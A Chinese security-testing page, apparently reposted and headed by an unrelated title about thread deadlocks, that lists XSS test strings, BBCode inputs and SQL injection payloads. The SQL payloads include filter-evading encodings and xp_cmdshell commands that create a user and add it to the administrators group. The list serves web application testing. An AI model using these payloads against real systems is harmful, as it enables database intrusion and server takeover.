多线程如何避免死锁 web安全性测试用例(2)

[u]一二三四五六七北京市[/u]

[font=微软雅黑"]一二三四五六七北京市[/font]

[size=4"]一二三四五六七北京市[/size]

[color=Red"]一二三四五六七北京市[/color]

[align=center"]一二三四五六七北京市[/align]

[float=left"]一二三四五六七北京市[/float]

[font=微软雅黑]一二三四五六七北京市[/font]

[size=4]一二三四五六七北京市[/size]

[color=Red]一二三四五六七北京市[/color]

[align=center]一二三四五六七北京市[/align]

[list=1]

[*]一二三四五六七北京市[/list]

[indent]一二三四五六七北京市[/indent]

[float=left]一二三四五六七北京市[/float]

[media=ra,400,300,0]?forumid=109[/media]

2. 输出编码

常用的测试输入语句有：

<input type="text"/>

<input/>

<input/

<script>alert(‘hello‘);</script>

1.jpg"left">"></a><script>alert(‘xss’);</script>

‘;alert(‘xss‘);var/ a=‘a

‘”>xss&<

a=”\” ; b=”;alert(/xss/);//”

<img src=“输出内容” border=“0” alt=“logo” />

“’”

‘”’

“””

“ “ “

“”“

“‘ ”

title=””

对输出数据到输出数据的对比，看是否出现问题。

3. 防止SQL注入

Admin--

‘or -------

‘ and ( ) exec insert * % chr mid

and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20AND%201=2

‘and 1=1 ; ‘And 1=1 ; ‘aNd 1=1 ;

and 1=2 ; ‘and 1=2

and 2=2

and user>0

and (select count(*) from sysobjects)>0

and (select count(*) from msysobjects)>0

and (Select Count(*) from Admin)>=0

and (select top 1 len(username) from Admin)>0(username 已知字段)

;exec master..xp_cmdshell “net user name password /add”—

;exec master..xp_cmdshell “net localgroup name administrators /add”—

and 0<>(select count(*) from admin)

简单的如where xtype=’U’，字符U对应的ASCII码是85，所以可以用where xtype=char(85)代替；如果字符是中文的，比如where name=’用户’，可以用where name=nchar(29992)+nchar(25143)代替。

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-67715-2.html